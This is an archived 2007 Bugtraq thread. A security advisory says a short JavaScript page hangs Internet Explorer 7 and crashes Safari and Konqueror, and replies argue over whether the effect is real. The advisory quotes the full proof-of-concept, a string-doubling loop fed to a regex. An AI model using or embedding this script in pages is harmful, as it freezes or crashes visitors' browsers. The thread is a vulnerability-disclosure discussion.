| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 18 Apr 2007 09:33:31 -0700 From: "Thor (Hammer of God)" <thor@...merofgod.com> To: "Tom Gregory" <sick.minded@...il.com> Cc: <bugtraq@...urityfocus.com> Subject: Re: Internet Explorer Crash Tested on several machines- max CPU went to 25, and IE came up asking if I wanted to stop the script in all cases. This is true of a default Vista install of IE 7 and XP Pro installs upgraded to IE 7. Scripting has to be on as well... Even on a dog computer, the prompt will come up (eventually). Non-issue here. t ----- Original Message ----- From: "Tom Gregory" <sick.minded@...il.com> To: "Thor (Hammer of God)" <thor@...merofgod.com> Cc: <bugtraq@...urityfocus.com> Sent: Wednesday, April 18, 2007 9:12 AM Subject: Re: Internet Explorer Crash > Actually Yes, the PoC crashing my IE, make it hang and my CPU usage goes > to 100%, and i'm using Internet Explorer 7.0.5730.11 like he said. > > Tom > > > > Thor (Hammer of God) wrote: >> Actually, I just get a message that says "A script on this page is >> causing Internet Explorer to run slowly." But my CPU usage for >> iexplore.exe is only at 20, and my system didn't slow down in the >> least. I went ahead and told IE to continue to run the script, and pops >> up again in a bit asking me the same thing. Finally bored, I say "no" >> and it immediately came up with "Goodbye" on the page. >> >> If this actually makes Safari and Konqueror crash, why the "stop using >> Microsoft products" recommendation? At least IE is smart enough to tell >> me that your little "stupidInternetExploder" script is being pesky. >> >> t >> >> ----- Original Message ----- From: "J. Oquendo" <sil@...iltrated.net> >> To: <bugtraq@...urityfocus.com> >> Sent: Tuesday, April 17, 2007 10:09 AM >> Subject: Internet Explorer Crash >> >> >>> >> Product: Internet Explorer Version 7.0.5730.11 >> Impact: Browser crash possibly more >> Author: Jesus Oquendo >> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' >> >> >> I. BACKGROUND >> Why bother? Who doesn't know what Internet Explorer and Microsoft are. >> >> II. DESCRIPTION >> IE 7 is vulnerable to a script which causes the browser to hang. The >> memory and CPU usage go through the roof. Originally the script caused >> (and still causes) Safari and Konqueror to crash. >> >> III SOLUTION >> Stop using Microsoft products or deal with a new advisory every other >> day. >> >> IV. Proof >> http://www.infiltrated.net/stupidInternetExploder.html >> >> V. Code >> >> $ more /stupidInternetExploder.html >> >> <script> >> >> var reg = /(.)*/; >> >> var z = 'Z'; >> while (z.length <= >> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 >> >> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 >> >> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 >> >> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 >> >> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) >> z+=z; >> var boum = reg.exec(z); >> >> </script> >> >> Goodbye >> >> >> J. Oquendo >> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 >> sil . infiltrated @ net http://www.infiltrated.net >> The happiness of society is the end of government. >> John Adams >> >> >>> >>> > > >
Powered by blists - more mailing lists